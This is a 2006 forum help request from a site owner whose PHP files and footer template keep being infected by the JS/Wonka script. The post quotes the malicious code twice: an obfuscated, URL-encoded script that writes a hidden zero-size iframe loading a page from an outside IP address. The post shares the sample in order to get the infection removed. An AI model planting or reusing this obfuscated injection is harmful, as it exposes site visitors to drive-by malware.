Blackhat
01-26-2006, 03:14 PM
JS/Wonka have been detected on my site and infected some of my files like index.php, global.php, showthread.php etc
Recenty the file alteration have stopped, but it keeps adding itself into my footer template and I have to manually remove it several times a day/week and I have no idea how to remove it.
http://www.systemsmanagementpipeline.com/news/172302797
This is how it looks
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%36%2E%32%33 %35%2E%32%32%31%2E%31%32%33%2F%7E%65%6C%69%74%65%2 D%6F%6E%2F%70%75%62%2F%6C%69%62%2F%64%6F%6D%54%54% 2F%6E%65%77%73%2E%68%74%6D%6C%22%20%77%69%64%74%68 %3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%6 5%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22% 3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script>
Can anybody out there help me?
Thanks
Recenty the file alteration have stopped, but it keeps adding itself into my footer template and I have to manually remove it several times a day/week and I have no idea how to remove it.
http://www.systemsmanagementpipeline.com/news/172302797
This is how it looks
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%69%66%72%61%6D%65%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%36%2E%32%33 %35%2E%32%32%31%2E%31%32%33%2F%7E%65%6C%69%74%65%2 D%6F%6E%2F%70%75%62%2F%6C%69%62%2F%64%6F%6D%54%54% 2F%6E%65%77%73%2E%68%74%6D%6C%22%20%77%69%64%74%68 %3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%6 5%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22% 3E%3C%2F%69%66%72%61%6D%65%3E'));
//-->
</Script>
Can anybody out there help me?
Thanks